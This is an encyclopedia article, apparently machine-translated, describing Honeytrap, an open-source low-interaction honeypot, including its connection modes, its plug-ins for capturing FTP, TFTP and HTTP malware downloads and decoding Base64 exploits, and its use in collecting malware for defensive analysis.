Honeytrap (software)

from Wikipedia, the free encyclopedia

Honeytrap is an open source network security tool that uses the low interaction honeypot principle to log attacks on vulnerabilities . However emulates Honeytrap no known vulnerabilities, but examines the network traffic with either a PCAP - sniffer means ip_queue API, or netfilter_queue to respond to unknown attacks.

methodology

After an incoming connection request, a listener starts dynamically for the corresponding port in order to process the requests. This generic behavior allows Honeytrap to respond to most network attacks.

All data collected is analyzed using plug-ins . These are loaded when the program starts, but also dynamically. This allows the honeypot to be expanded without taking a break. Since attacks sometimes do not continue without a response from the host , a rudimentary catalog of responses was implemented that can be expanded as required.

Incoming connections can be handled in four different modes. In normal mode , a protocol is created about the attack, in ignore mode Honeytrap remains inactive, proxy mode allows connections to be forwarded, and in mirror mode attacks can be reflected back to the attacker. With mirroring, it is no longer necessary to emulate vulnerabilities, as many attackers have them themselves and thus a complete dialogue is established. The behavior for ports can be configured individually. Honeytrap is also suitable as a meta honeypot thanks to its proxy mode.

construction

An attack usually takes place over several levels: After the target has been successfully exploited , data is downloaded from the Internet, which then opens a back door for the attacker. Honeytrap adapts to this process thanks to its modular structure:

  • A framework for storing the attack flow and the collected data for external investigation.
  • A parser for FTP download commands. Loaded files are saved on the hard drive.
  • A parser for TFTP download commands with the same goal as for FTP.
  • A parser for HTTP - URLs for attacks against vulnerable VNC server. With the help of wget , data is also downloaded here.
  • Exploits encoded with Base64 are decrypted by another plug-in to enable the following analyzes.
  • A module to identify new attacks based on heuristics and similarity.

target

Honeytrap is operated as a daemon and enables, among other things, the collection of malware , viruses and Trojans . These are mainly distributed to build botnets .

By analyzing them, a deeper insight into how they work can be obtained, which simplifies the creation of protective measures.

Web links